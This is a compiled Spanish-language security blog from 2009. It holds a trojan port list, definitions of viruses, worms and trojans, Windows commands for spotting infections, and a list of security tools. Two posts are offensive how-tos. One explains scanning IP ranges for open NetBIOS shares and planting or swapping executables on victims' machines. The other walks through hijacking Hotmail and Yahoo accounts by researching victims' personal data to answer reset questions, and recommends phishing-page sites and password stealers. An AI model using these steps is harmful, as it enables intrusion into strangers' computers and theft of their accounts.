port 5402 Back Construction, Blade Runner
port 5512 Illusion Mailer
port 5534 The Flu
port 5550 Xtcp
port 5555 ServeMe
port 5556 BO Facil
port 5557 BO Facil
port 5569 Robo-Hack
port 5637 PC Crasher
port 5638 PC Crasher
port 5742 WinCrash
port 5760 Portmap Remote Root Linux Exploit
port 5880 Y3K RAT
port 5882 Y3K RAT
port 5882 (UDP) - Y3K RAT
port 5888 Y3K RAT
port 5888 (UDP) - Y3K RAT
port 5889 Y3K RAT
port 6000 The Thing
port 6006 Bad Blood
port 6272 Secret Service
port 6400 The Thing
port 6661 TEMan, Weia-Meia
port 6666 Dark Connection Inside, NetBus worm
port 6667 Dark FTP, ScheduleAgent, SubSeven, Subseven 2.1.4 DefCon 8, Trinity, WinSatan
port 6669 Host Control, Vampire
port 6670 BackWeb Server, Deep Throat, Foreplay, WinNuke eXtreame
port 6711 BackDoor-G, SubSeven, VP Killer
port 6712 Funny trojan, SubSeven
port 6713 SubSeven
port 6723 Mstream
port 6771 Deep Throat, Foreplay
port 6776 2000 Cracks, BackDoor-G, SubSeven, VP Killer
port 6838 (UDP) - Mstream
port 6883 Delta Source DarkStar (??)
port 6912 Shit Heep
port 6939 Indoctrination
port 6969 GateCrasher, IRC 3, Net Controller, Priority
port 6970 GateCrasher
port 7000 Exploit Translation Server, Kazimas, Remote Grab, SubSeven, SubSeven 2.1 Gold
port 7001 Freak88, Freak2k
port 7215 SubSeven, SubSeven 2.1 Gold
port 7300 NetMonitor
port 7301 NetMonitor
port 7306 NetMonitor
port 7307 NetMonitor
port 7308 NetMonitor
port 7424 Host Control
port 7424 (UDP) - Host Control
port 7597 Qaz
port 7626 Glacier
port 7777 God Message, Tini
port 7789 Back Door Setup, ICKiller
port 7891 The ReVeNgEr
port 7983 Mstream
port 8080 Brown Orifice, RemoConChubo, Reverse WWW Tunnel Backdoor, RingZero
port 8787 Back Orifice 2000
port 8988 BacHack
port 8989 Rcon, Recon, Xcon
port 9000 Netministrator
port 9325 (UDP) - Mstream
port 9400 InCommand
port 9872 Portal of Doom
port 9873 Portal of Doom
port 9874 Portal of Doom
port 9875 Portal of Doom
port 9876 Cyber Attacker, Rux
port 9878 TransScout
port 9989 Ini-Killer
port 9999 The Prayer
port 10000 OpwinTRojan
port 10005 OpwinTRojan
port 10067 (UDP) - Portal of Doom
port 10085 Syphillis
port 10086 Syphillis
port 10100 Control Total, Gift trojan
port 10101 BrainSpy, Silencer
port 10167 (UDP) - Portal of Doom
port 10520 Acid Shivers
port 10528 Host Control
port 10607 Coma
port 10666 (UDP) - Ambush
port 11000 Senna Spy Trojan Generator
port 11050 Host Control
port 11051 Host Control
port 11223 Progenic trojan, Secret Agent
port 12076 Gjamer
port 12223 Hack´99 KeyLogger
port 12345 Ashley, cron / crontab, Fat Bitch trojan, GabanBus, icmp_client.c, icmp_pipe.c, Mypic, NetBus, NetBus Toy, NetBus worm, Pie Bill Gates, Whack Job, X-bill

port 12346 Fat Bitch trojan, GabanBus, NetBus, X-bill
port 12349 BioNet
port 12361 Whack-a-mole
port 12362 Whack-a-mole
port 12363 Whack-a-mole
port 12623 (UDP) - DUN Control
port 12624 ButtMan
port 12631 Whack Job
port 12754 Mstream
port 13000 Senna Spy Trojan Generator, Senna Spy Trojan Generator
port 13010 Hacker Brasil - HBR
port 13013 PsychWard
port 13014 PsychWard
port 13223 Hack´99 KeyLogger
port 13473 Chupacabra
port 14500 PC Invader
port 14501 PC Invader
port 14502 PC Invader
port 14503 PC Invader
port 15000 NetDemon
port 15092 Host Control
port 15104 Mstream
port 15382 SubZero
port 15858 CDK
port 16484 Mosucker
port 16660 Stacheldraht
port 16772 ICQ Revenge
port 16959 SubSeven, Subseven 2.1.4 DefCon 8
port 16969 Priority
port 17166 Mosaic
port 17300 Kuang2 the virus
port 17449 Kid Terror
port 17499 CrazzyNet
port 17500 CrazzyNet
port 17569 Infector
port 17593 Audiodoor
port 17777 Nephron
port 18753 (UDP) - Shaft
port 19864 ICQ Revenge
port 20000 Millenium
port 20001 Millenium, Millenium (Lm)
port 20002 AcidkoR
port 20005 Mosucker
port 20023 VP Killer
port 20034 NetBus 2.0 Pro, NetBus 2.0 Pro Hidden, NetRex, Whack Job
port 20203 Chupacabra
port 20331 BLA trojan
port 20432 Shaft
port 20433 (UDP) - Shaft
port 21544 GirlFriend, Kid Terror
port 21554 Exploiter, Kid Terror, Schwindler, Winsp00fer
port 22222 Donald Dick, Prosiak, Ruler, RUX The TIc.K
port 23005 NetTrash
port 23006 NetTrash
port 23023 Logged
port 23032 Amanda
port 23432 Asylum
port 23456 Evil FTP, Ugly FTP, Whack Job
port 23476 Donald Dick
port 23476 (UDP) - Donald Dick
port 23477 Donald Dick
port 23777 InetSpy
port 24000 Infector
port 25685 Moonpie
port 25686 Moonpie
port 25982 Moonpie
port 26274 (UDP) - Delta Source
port 26681 Voice Spy
port 27374 Bad Blood, Ramen, Seeker, SubSeven, SubSeven 2.1 Gold, Subseven 2.1.4 DefCon 8, SubSeven Muie, Ttfloader
port 27444 (UDP) - Trinoo
port 27573 SubSeven
port 27665 Trinoo
port 28678 Exploiter
port 29104 NetTrojan
port 29369 ovasOn
port 29891 The Unexplained
port 30000 Infector
port 30001 ErrOr32
port 30003 Lamers Death
port 30029 AOL trojan
port 30100 NetSphere
port 30101 NetSphere
port 30102 NetSphere
port 30103 NetSphere
port 30103 (UDP) - NetSphere
port 30133 NetSphere
port 30303 Sockets des Troie
port 30947 Intruse
port 30999 Kuang2
port 31335 Trinoo
port 31336 Bo Whack, Butt Funnel
port 31337 Back Fire, BackOrifice 1.20 patches, BackOrifice (Lm), BackOrifice russian, Baron Night, Beeone, BO client, BO Facil, BO spy, BO2, cron / crontab, Freak88, Freak2k, icmp_pipe.c, Sockdmini

port 31337 (UDP) - BackOrifice, Deep BO
port 31338 Back Orifice, Butt Funnel, NetSpy (DK)
port 31338 (UDP) - Deep BO
port 31339 NetSpy (DK)
port 31666 BOWhack
port 31785 Hack´a´Tack
port 31787 Hack´a´Tack
port 31788 Hack´a´Tack
port 31789 (UDP) - Hack´a´Tack
port 31790 Hack´a´Tack
port 31791 (UDP) - Hack´a´Tack
port 31792 Hack´a´Tack
port 32001 Donald Dick
port 32100 Peanut Brittle, Project nEXT
port 32418 Acid Battery
port 33270 Trinity
port 33333 Blakharaz, Prosiak
port 33577 Son of PsychWard
port 33777 Son of PsychWard
port 33911 Spirit 2000, Spirit 2001
port 34324 Big Gluck, TN
port 34444 Donald Dick
port 34555 (UDP) - Trinoo (for Windows)
port 35555 (UDP) - Trinoo (for Windows)
port 37237 Mantis
port 37651 Yet Another Trojan - YAT
port 40412 The Spy
port 40421 Agent 40421, Masters Paradise
port 40422 Masters Paradise
port 40423 Masters Paradise
port 40425 Masters Paradise
port 40426 Masters Paradise
port 41337 Storm
port 41666 Remote Boot Tool - RBT, Remote Boot Tool - RBT
port 44444 Prosiak
port 44575 Exploiter
port 47262 (UDP) - Delta Source
port 49301 OnLine KeyLogger
port 50130 Enterprise
port 50505 Sockets des Troie
port 50766 Fore, Schwindler
port 51966 Cafeini
port 52317 Acid Battery 2000
port 53001 Remote Windows Shutdown - RWS
port 54283 SubSeven, SubSeven 2.1 Gold
port 54320 Back Orifice 2000
port 54321 BackOrifice 2000, School Bus
port 55165 File Manager trojan, File Manager trojan, WM Trojan Generator
port 55166 WM Trojan Generator
port 57341 NetRaider
port 58339 Butt Funnel
port 60000 DeepThroat, Foreplay, Sockets des Troie
port 60001 Trinity
port 60068 Xzip 6000068
port 60411 Connection
port 61348 Bunker-Hill
port 61466 TeleCommando
port 61603 Bunker-Hill
port 63485 Bunker-Hill
port 64101 Taskman
port 65000 Devil, Sockets des Troie, Stacheldraht
port 65390 Eclypse
port 65421 Jade
port 65432 The Traitor (= th3tr41t0r)
port 65432 (UDP) - The Traitor (= th3tr41t0r)
port 65534 /sbin/initd
port 65535 RC1 trojan

A SABER :Con el comando netstat -na sabemos que puertos tenemos abiertos
ESTE COMANDO SE USA EN EL DOS

Definicion de los virus, gusanos y troyanos

2009-10-23T23:19:00.000+02:00

¿Qué es un virus?

Un virus es código informático que se adjunta a sí mismo a un programa o archivo para propagarse de un equipo a otro. Infecta a medida que se transmite. Los virus pueden dañar el software, el hardware y los archivos.

Virus Código escrito con la intención expresa de replicarse. Un virus se adjunta a sí mismo a un programa host y, a continuación, intenta propagarse de un equipo a otro. Puede dañar el hardware, el software o la información.

Al igual que los virus humanos tienen una gravedad variable, desde el virus Ébola hasta la gripe de 24 horas, los virus informáticos van desde molestias moderadas hasta llegar a ser destructivos. La buena noticia es que un verdadero virus no se difunde sin la intervención humana. Alguien debe compartir un archivo o enviar un mensaje de correo electrónico para propagarlo.
Principio de la páginaPrincipio de la página

¿Qué es un gusano?

Un gusano, al igual que un virus, está diseñado para copiarse de un equipo a otro, pero lo hace automáticamente. En primer lugar, toma el control de las características del equipo que permiten transferir archivos o información. Una vez que un gusano esté en su sistema, puede viajar solo. El gran peligro de los gusanos es su habilidad para replicarse en grandes números. Por ejemplo, un gusano podría enviar copias de sí mismo a todos los usuarios de su libreta de direcciones de correo electrónico, lo que provoca un efecto dominó de intenso tráfico de red que puede hacer más lentas las redes empresariales e Internet en su totalidad. Cuando se lanzan nuevos gusanos, se propagan muy rápidamente. Bloquean las redes y posiblemente provocan esperas largas (a todos los usuarios) para ver las páginas Web en Internet.

Gusano Subclase de virus. Por lo general, los gusanos se propagan sin la intervención del usuario y distribuye copias completas (posiblemente modificadas) de sí mismo por las redes. Un gusano puede consumir memoria o ancho de banda de red, lo que puede provocar que un equipo se bloquee.

Debido a que los gusanos no tienen que viajar mediante un programa o archivo "host", también pueden crear un túnel en el sistema y permitir que otro usuario tome el control del equipo de forma remota. Entre los ejemplos recientes de gusanos se incluyen: Sasser y Blaster.

¿Qué es un troyano?

Del mismo modo que el caballo de Troya mitológico parecía ser un regalo pero contenía soldados griegos que dominaron la ciudad de Troya, los troyanos de hoy en día son programas informáticos que parecen ser software útil pero que ponen en peligro la seguridad y provocan muchos daños. Un troyano reciente apareció como un mensaje de correo electrónico que incluye archivos adjuntos que aparentaban ser actualizaciones de seguridad de Microsoft, pero que resultaron ser virus que intentaban deshabilitar el software antivirus y de servidor de seguridad.

Troyano Programa informático que parece ser útil pero que realmente provoca daños.

Los troyanos se difunden cuando a los usuarios se les engaña para abrir un programa porque creen que procede de un origen legítimo. Para proteger mejor a los usuarios, Microsoft suele enviar boletines de seguridad por correo electrónico, pero nunca contienen archivos adjuntos. También publicamos todas nuestras alertas de seguridad en nuestro sitio Web de seguridad antes de enviarlas por correo electrónico a nuestros clientes.

Los troyanos también se pueden incluir en software que se descarga gratuitamente. Nunca descargue software de un origen en el que no confíe. Descargue siempre las actualizaciones y revisiones de Microsoft de los sitios Microsoft Windows Update o Microsoft Office Update.

¿Cómo se transmiten los gusanos y otros virus?

Prácticamente todos los virus y muchos gusanos no se pueden transmitir a menos que se abra o se ejecute un programa infectado.

Muchos de los virus más peligrosos se difundían principalmente mediante archivos adjuntos de correo electrónico, los archivos que se envían junto con un mensaje de correo electrónico. Normalmente se puede saber que el correo electrónico incluye un archivo adjunto porque se muestra el icono de un clip que representa el archivo adjunto e incluye su nombre. Algunos tipos de archivos que se pueden recibir por correo electrónico habitualmente son fotos, cartas escritas en Microsoft Word e, incluso, hojas de cálculo de Excel. Un virus se inicia al abrir un archivo adjunto infectado (normalmente se hace clic en el icono de archivo adjunto para abrirlo).
Sugerencia

Sugerencia: nunca abra nada que esté adjunto a un mensaje de correo electrónico a menos que espere el archivo y conozca el contenido exacto de dicho archivo.

Si recibe un correo electrónico con un archivo adjunto de un desconocido, elimínelo inmediatamente. Por desgracia, en ocasiones tampoco resulta seguro abrir archivos adjuntos de personas que conoce. Los virus y los gusanos tienen la capacidad de robar la información de los programas de correo electrónico y enviarse a todos los incluidos en la libreta de direcciones. Por lo tanto, si recibe un correo electrónico de alguien con un mensaje que no entiende o un archivo que no esperaba, póngase siempre en contacto con la persona y confirme el contenido del archivo adjunto antes de abrirlo.

Otros virus se pueden propagar mediante programas que se descargan de Internet o de discos repletos de virus que dejan los amigos o incluso que se compran en una tienda. Existen formas menos habituales de contraer un virus. La mayoría de las personas se contagian de virus si abren y ejecutan archivos adjuntos de correo electrónico desconocidos.

¿Cómo puedo saber si tengo un gusano u otro virus?

Al abrir y ejecutar un programa infectado, es posible que no sepa que ha contraído un virus. Su equipo puede hacerse más lento o bloquearse y reiniciarse cada pocos minutos. En ocasiones, un virus ataca los archivos que necesita para iniciar un equipo. En este caso, puede presionar el botón de encendido y estar mirando una pantalla vacía.

Todos estos síntomas son signos habituales de que el equipo tiene un virus, aunque se pueden deber a problemas de hardware o software que nada tengan que ver con un virus.

Preste atención a los mensajes que indiquen que ha enviado correo electrónico con virus. Puede significar que el virus ha incluido su dirección de correo como el remitente de un correo electrónico infectado. Esto no significa necesariamente que tenga un virus. Algunos virus tienen la capacidad de falsificar las direcciones de correo electrónico.

A menos que tenga instalado software antivirus actualizado en el equipo, no existe un modo seguro de saber si tiene un virus. Si no dispone de software antivirus actual o si desea instalar otra marca de software antivirus, visite nuestra página de descargas de software de seguridad.

Fuente:foro.latinohack

5 comandos para detectar ataques en windows

2009-10-22T16:25:00.000+02:00

Hoy vamos a aprender a examinar una maquina en busca de malware o conexiones no apropiadas de una maquina.
Como muchos sabemos los programas espias , troyanos etc.. utilizan una parte de conexion a internet para mandar datos a su creador o a la persona que nos infecto, hoy vamos a aprender como podemos identificarlos , ya queda en ustedes investigar el nombre del proceso y que tipo de software pueden tener instalado que pueden dañar su integridad , por razones de extencion no vamos a ver que tipos de programas malware existen.

1) WMIC: Un mundo de aventura espera
Instrumentación de Dirección de Ventanas (WMIC) ; WMIC deja a usuarios administrativos tener acceso a todas las clases de información detallada sobre una máquina en Ventanas, incluyendo los atributos detallados de unos miles de ajustes y objetos. WMIC es construido en D.O.S.
Para usar WMIC, los usuarios deben digitar el comando wmic en el interprete de comandos(D.O:S) el automanticamente lo instalara y estaremos listos para empezar.
C: \>wmic process

De seguro saldra un resultado casi no leible, por la razon que no le dimos comandos para organizar la salida de la consulta.
Wmic nos permite organizar la salida de las consultas de forma de lista o full.
Por ejemplo, podemos mirar un resumen(sumario) de cada proceso que corre sobre una máquina :

C: \> wmic process list brief

Mostrará el nombre, ID y prioridad de cada proceso, así como otros atributos interesantes. Para Conseguir aún más detalle, digitamos:

C: \> wmic process list full

Muestra todas las clases de detalles, incluyendo el hilo del ejecutable asociado con el proceso y su invocación de línea de mando. Si Investigamos una máquina por una infección, un administrador debería mirar cada proceso para determinar si tiene procesos legítimos sobre la máquina.
Más allá de mirar el l alias de un proceso, los usuarios podrían incluir en el arranque un proceso determiando, para conseguir una lista de todos los programas de inicio sobre una máquina utilizaremos el siguiente comando:

C: \> wmic startup list full

Mucho malware automáticamente utiiliza el autoinicio añadiendo una entrada de autorun junto a los procesos legítimos que pueden pertenecer antivirus y varios programas de bandeja de sistema.
Una opción práctica dentro de WMIC es la capacidad de controlar un mando de la información creciente en una base repetida por usando la sintaxis " / cada: [N] " .[La N] es un número entero, indicando que WMIC debera controlar la orden dado cada [N] segundos. Así, los usuarios pueden buscar cambios de los ajustes del sistema con el tiempo. Usando esta función para tirar un resumen(sumario) de proceso cada 5 segundos, usuarios podrían correr:

C: \> wmic process list brief /every:1

CTRL+C para parrar el ciclo.
2) El comando net:

Los administradores pueden usar esto para mostrar todas las clases de información útil.
Por ejemplo, " net user" muestra todas las cuentas de usuario definidas sobre la máquina. " net localgroup " muestra los grupos, " net localgroup administrators" muestra los usuarios del grupo de administradores " net start " muestra los servicios que estan corriendo.
Los atacantes con frecuencia añaden a usuarios a un sistema o ponen sus propias cuentas en los grupos de administradores, entonces esto es siempre una idea buena de comprobar la salida de estas órdenes para ver si un atacante ha manipulado las cuentas sobre una máquina. También, algunos atacantes crean sus propios servicios en una máquina.

3) Openfiles:

Como su nombre implica, este mando muestra todos los archivos que son abiertos sobre windows, indicando el nombre de proceso que actúa recíprocamente con cada archivo,esto mostrará todos los archivos abiertos , dando el nombre de proceso y el camino de cada archivo.

Por la cantidad de datos que nos arrojan las estadisticas debemos fltrar la salida de informacion

C: \> openfiles /local on

C: \> openfiles /query /v

Este mando mostrará la salida verbosa, que incluye la cuenta de usuario y cada proceso abierto activo. Cuando terminado con el mando de openfiles, puede ser cerrada y el sistema vuelve a sul funcionamiento normal :

C: \> openfiles /local off

4) Netstat: Muéstra la red

este comando muestran la actividad de red, enfocando TCP y UDP por defecto. Como los malware a menudo se comunica a través de la red, los usuarios pueden buscar conexiones desconocidas en la salida de netstat, para esto ejecutamos así:

C: \> netstat -nao

La opción-n dice a netstat que muestre números en su salida, no los nombres de máquinas y protocolos, y en cambio muestra direcciones de IP Y TCP o números de puerto de UDP. El-a indica que muestre todas las conexiones y puertos de escucha. La opción-o dice a netstat mostrar el número de processID de cada programa que actúa recíprocamente con el puerto de UDP O UN TCP. Si, en vez de TCP Y UDP, usted está interesado en ICMP, netstat tambien lo puede hacer:

C: \> netstat-s-p icmp

Esto devolverá la estadística (-s) del protocolo ICMP. Aunque no tan detallado como el TCP y UDP, los usuarios puedan ver si una máquina envía el tráfico frecuente e inesperado ICMP sobre la red. Algunas puertas traseras y otro malware comunican la utilización de la carga útil de mensajes de Eco de ICMP.

Como WMIC, el comando netstat también nos deja controlarlo cada N segundos. Pero, en vez de usar la sintaxis WMIC " de / cada: [N] ", los usuarios simplemente siguen su invocación netstat con un espacio y un número entero. Así, para catalogar el TCP y puertos UDP en el empleo sobre una máquina cada 2 segundos, usuarios pueden correr:

C: \> netstat-na 2

5) Find:: Busqueda

La mayor parte de las órdenes de las que he hablado hasta ahora dan mucha informacion de salida , que podría ser difícil o maluca la examinacion para una persona encontrar un artículo específico.
Invocado con el mando /c, contará el número de las líneas de su salida que incluyen un valor dado. Los usuarios a menudo quieren contar el número de líneas en la salida de un mando, determinar cuántos procesos controlan, cuantos procesos de arranque están presentes. Para contar las líneas de salida, los usuarios podrían simplemente hacerlo con /c/v " ". Este mando contará (/c) el número de las líneas que no tienen (/v) una línea en blanco (" ") en ellos.

Por ejemplo, para mirar información cada segundo sobre procesos que corren sobre de cmd.exe :

C: \> wmic process list brief /every:1 | find "cmd.exe"

O, para ver que procesos autoinician, son asociados con el registro HKLM :

C: \> wmic startup list brief | find /i "hklm"

Contar el número de archivos que se abren sobre una máquina sobre la cual openfiles es activada:

C: \> openfiles /query /v | find /c /v ""

RESUMEN:

Con estos cinco instrumentos, los usuarios pueden conseguir mucha información sobre la configuración y el estado de seguridad de una máquina por medio de Ventanas(D.O.S) en busca de denticar un compromiso o ataque, sin embargo, un usuario tiene que comparar los ajustes que corren en la maquina examinada con una máquina "normal", no infectada.

fuente: http://bad-robot.blogspot.com

HERRAMIENTAS DE SEGURIDAD

2009-10-21T14:41:00.000+02:00

HERRAMIENTAS ANTISPYWARE:

a-squared
Adaware
CWShredder
ETremover - EliteToolbar Remover V.2.1.2
Ewido
HijackThis
Malwarebytes
Spybot S & D
Spywareblaster

HERRAMIENTAS PARA LIMPIAR EL REGISTRO:

JV16 1.2.0.195 (Freeware)
RegCleaner

ANTIVIRUS ON-LINE:

a-squared
BitDefender
Ewido
Kaspersky
TrendMicro
Panda
Symantec
F-Secure
Virus Total (escaneo con varios antivirus del mercado)

ANTIVIRUS GRATUITOS:

Avast!
AVG
Avira
ClamWin

FIREWALLS GRATUITOS:

Comodo
Outpost
Sunbelt Kerio
Sygate
ZoneAlarm

TESTS PARA FIREWALLS:

AuditMyPc
Internautas
ShieldsUp
Sygate
Upseros

RECURSOS IP:

IPNetInfo
Localizador de direcciones IP
Mi IP pública actual

HERRAMIENTAS PARA ANALISIS Y REPARACION DE DISCOS:

Ultimate Boot CD

HERRAMIENTAS PARA WINDOWS:

Autoruns: Herramienta para conocer los elementos que auto-inician con Windows (úsese SOLO como análisis y NO como "reparador" de problemas)
Centro de descargas de Microsoft
ERUNT: Herramienta para respaldo y recuperación del registro
LSPFix: Herramienta para reparar el acceso a Internet cuando ciertos programas (generalmente malware) lo han "roto"
Microsoft Sysinternals: Conjunto de utilidades para Windows
Microsoft Update
Process Explorer: Herramienta alternativa al Administrador de tareas (taskmgr.exe)
SP3 para XP

¿Cómo saber si tu PC es zombie?

2009-10-19T10:04:00.000+02:00

Zombie es la denominación que se asigna a computadoras que tras haber sido infectadas por algún tipo de malware, pueden ser usadas por una tercera persona para ejecutar actividades hostiles. Este uso se produce sin la autorización o el conocimiento del usuario del equipo. El nombre procede de los zombis o muertos vivientes esclavizados, figuras legendarias surgidas de los cultos vudú.

Con estos tres sencillos consejos, podremos en general, obtener indicios suficientes para sospechar si estamos o no contaminados y si nuestro equipo está comprometido, pudiendo pertenecer a una red Zombie.

* Primero: Ver si todo lo que está en ejecución en nuestro ordenador es todo lo que creemos tener instalado.

Para ello, podemos utilizar software de inspección de procesos como el propio administrador de tareas que aparece al pulsar Ctr+Alt+Sup o un programa mejor como el ProcessXP indicando en el menú de View, sección “select columns” que queremos ver cual es el “command line” de los procesos. Traducido, ver cada programa que está en ejecución en qué directorio se encuentra. También es interesante saber si algún programa se intenta ocultar y para ello podemos usar, también de Sysinternal, el Rootkit revealer.

* Segundo: Ver si nuestro PC está conectado a Internet a los sitios correctos que estamos utilizando.

Existen diferentes programas para averiguar esta información aunque solo nombraré varias alternativas:
- La más sencilla es utilizar el comando NETSTAT con el parámetro -B que indica cada conexión que programa la está utilizando. En esta url hay más información sobre cómo usar este parámetro.
- Otra opción es usar la aplicación de Foundstone Fport
- Si somos de interfaces gráficas, la gente de Sysinternal en su momento también creo la herramienta TcpView con estos propósitos.

* Tercero: Revisar si nuestro ordenador tiene instalado malware utilizando los scanner online que ya se ofrecen.

Para eso, podemos hacer una serie de comprobaciones básicas de las claves de registro que suele utilizar el malware a traves de REGEDIT.EXE. En concreto, las claves de registro a mirar son:

* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ RunServices
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ RunOnce\Setup
También disponemos de las Webs que analizan nuestro equipo en remoto para investigar si detectan algún tipo de software extraño como:
- Safety.live.com de Microsoft.
- Panda ActiveScan with TruPrevent®

Evitar convertirse en Zombie: No navegar de forma abierta buscando ficheros de información lúdica, entornos no profesionales y de empresas desconocidas, ya que es fácil acabar en una web contaminada que nos haga descargar, sin darnos cuenta, programas que se ejecutarán en nuestro ordenador. Además, activar todos los mecanismos de seguridad del PC (antivirus, antispam, cortafuegos, copias de seguridad, etc.) y actualizarlos frecuentemente, tener dos particiones en el disco duro, una para el sistema operativo y los programas y otra para los documentos.

Fuente: Lestat-Blog De Seguridad Informatica

Tener archivos compartidos en pc grave error

2009-10-16T11:23:00.000+02:00

En 1984, IBM diseñó un simple "application programming interface" (API/APIS) para conectar en red sus computadoras, llamado Network Basic Input/Output System (NetBIOS). El API NetBIOS proporcionaba un diseño rudimentario para que una aplicación se conectara y compartiese datos con otras computadoras.
Sabiendo esto
tener los archivos compartidos en pc es un grave error, ya que existen herramientas
como scaner que facilita el ingreso mediante netbios a otras pcs.Primero que nada Netbios significa Network Basic Input Output system (Sistema basico de red de entrada y salida), esto no es considerado un bug, ni un backdoor ni nada asi q yo no lo considero reto, y por lo tanto no lo considero hacking"
Generalmente son pcs de personas que comparten algunos de sus archivos no importantes como musica o imagenes. Pero en muchos de los casos se encuentran pcs que estan compartiendo todos sus discos (grave error).Aunque no se puede ejecutar archivos con este metodo se puede colar un "archivo" en la carpeta C:\Documents and Settings\Administrador\Menú Inicio\Programas\Inicio, asi cuando se reinicie la pc se ejecutara ese "archivo".
Otro metodo consite en infectar o reemplazar archivos que se utilizen mucho en esa pc, como por ejemplo el msno el IE, asi cada vez que la victima haga click en el msn o el IE se ejecute nuestro "archivo".

Una de tantas esas herramientas son :

1.-SoftPerfect Network Scanner.Su uso es muy simple, primero seleccionamos un rango de ips, yo seleccione un rango grande desde 190.30.0.0 hasta 190.31.0.0 , despues hacemos click en "Start Scanning".. y empezaran a salir todas las pcs que esten conectadas a internet.
La mayoria de estas pcs no estaran compartiendo archivos, las que si lo esten tienen que tener un [>]o un [+] a la izquierda de la imagen de su pc.
Entonces cuando queremos ver que archivos comparte una pc hacemos click en esa pestañita y saldran las carpetas. Para ver que contiene cada carpeta hacemos click en la misma y apareceran todos sus archivos y subcarpetas, vale aclarar que se puede descargar, subir y ejecutar archivos en nuestra pc.

2.-Essential NetTools.Essential NetTools es un conjunto de herramientas útiles en el diagnóstico de redes y monitoreo de conexiones de red de su computadora.Su uso es igual al otro scaner, seleccionamos un rango de ips, para iniciar la auditoria, haga clic en el botón Start(Iniciar).

La cara oculta de Facebook

2009-10-15T13:02:00.001+02:00

Espero lo vean hasta el final !!
esta buena la Info!!

hackear hotmail

2009-10-14T12:40:00.000+02:00

Este post lo pongo para que sepais como os lo pueden hacer si lo haceis vostros eso ya es cuenta vuestra.

1.-El Método que vamos a comentar en primer lugar se basa en la Igeniería Social, es decir, en la recopilación de datos personales de la víctima (si quieres información más extensa sobre Ingeniería Social busca en el google ).
Todas las personas eligen como password una clave fácil de recordar o que simbolice algo importante para ellas, por ejemplo el nombre de sus hijos, de su mascota, de su grupo de música preferido, etc... El password MAS USADO es la fecha de nacimiento de la víctima, de su esposa/novia, o su fecha de aniversario.
Algo que no debes olvidar NUNCA es que yahoo tiene un sistema de seguridad muy curioso. Si intentas acceder 8-9 veces a la cuenta de un usuario, y no introduces la pass correcta, no te dejará volver a intentarlo en las próximas 24 horas y borrará TODOS los mensajes que tuviera el usuario.
¿Qué podemos hacer entonces para entrar en su cuenta?
Debemos conocer su Fecha de Nacimiento, su Nacionalidad y su Codigo Postal. y algo más que después veremos. Asi que ponte a recopilar información. La nacionalidad es fácil de averiguar, y si sabes la ciudad ya puedes buscar su Cod. Postal usando google. En cuanto a su fecha de Nacimiento es algo más difícil, pero tal vez la haya puesto en su ficha personal pública en algún foro o algo así. Búsca en google su nick y seguramente te salga información valiosa sobre él.
Una vez que tengas esta información entra en hotmail (o yahoo), pincha en "olvidé mi contraseña" o "generar una nueva contraseña" entonces te aparecerá un breve cuestionario. Tendrás que poner aquí los datos que previamente buscaste: Fecha de Nacimiento, Nacionalidad y C.P. ¿Qué ocurre si me dice que los datos no son correctos? Puede que nosotros no s hayamos equivocado al introducirlos, que no sean realmente correctos, o que la víctima mintiera y pusiera datos falsos al registrarse... Si algo de esto ocurre entonces inténtalo con el método 2.
Si tienes suerte y los datos coinciden, te encontrarás frente a la Pregunta Secreta. Puede ser algo así como:
¿Cuál es el nombre de tu mascota?
¿Cuál es el segundo apellido de tu padre?
Esta es la única información que te separa de la cuenta de tu víctima, así que ya sabes, vuelve a ponerte las pilas y BUSCA la respuesta!!

2.-El segundo método consiste en enviar un EXLOIT a la victima.EL término "exploit" tiene dos acepciones, la primera y original, se refiere a un programa expresamente diseñado para explotar una vulnerabilidad (bug) ed un sistema (esto no nos viene al caso). La otra acepción es la que nos interesa.. Exploit es un cuestionario ideado específicamente para engañar a un usuario de yahoo o hotmail, la víctima lo rellena con sus datos y entonces el programa manda toda esta información (entre ella su contraseña) a nuestro email. Puedes encontrar algunos exploits muy bien conseguidos creados en lenguaje HTML y puedes mandarlos directamente desde algunas webs. (otros exploits no usan lenguaje html, como por ejemplo el método 3).
En www.hack.msn.net puedes encontrar exploits muy bien conseguidos, en la web vienen también las instrucciones de como mandarlos y dónde mirar la password de la víctima. Es un site recomendado por R3ckt3z en este mismo foro.
En www.hack-hotmail.net también hay exploits muy buenos.
Si quieres exploits diferentes o para otras cuentas de correo búscalos tú mismo en google.

3.-Este Método es una ESTAFA con la que te pueden ROBAR TU PASSWD!!.
Manda un correo recovermypwd@hotmail.com, en el subject pones "Recover passwd=fiel&valid" sin comillas. En el cuerpo del mensaje pones lo siguiente:
"10%tucorreo@loquesea.com%tucontraseña=passwd%20%=valid?
10%tuvíctima@hotmail.com/%?&" todo sin comillas, esto hará que hotmail te envíe la constraseña solicitada directamente a tu correo. (esto es completamente FALSO! Es tan solo un ejemplo!)
Te ecnontrarás por internet algunos "trucos" como este.. lo que tal vez ignores es que "recovermypwd@hotmail" es el correo que ha creado algún listillo, y le estás enviando tu correo y tu contraseña!!! ten cuidado, que es una estafaaa!
A estas técnicas de engaño se les llama Ingeniería Social.

4.-Este método es conocido como Web Spoofing, y consiste en simular la pantalla de bienvenida de hotmail o yahoo, y cuando alguien mete su login y contraseña, envía estos datos al email de quien lo configuró. Es básicamente el mismo sistema que el exploit.

5.- Usar un programa stealer que tenga la función de sacar el pass del msn (100% de efectividad)

6.- Usar un programa de fuerza bruta (0% de efectividad, no se recomienda para nada)se bloquean los correos

7.-Por ultimo hay otro metodo en el cual hay gente sin escrupulos que son los tecnicos en pc(no digo todos), los cuales al reparar el pc meten un troyano o un keylloger pero no para sacar cuentas de correo sino para poder hacer carding o venderlos datos bancarios a terceras personas para que ellos hagan carding.

Bueno con esto es como os sacan las cuentas de correo.

Uniblue Driver Scanner 2009

2009-10-12T12:30:00.000+02:00

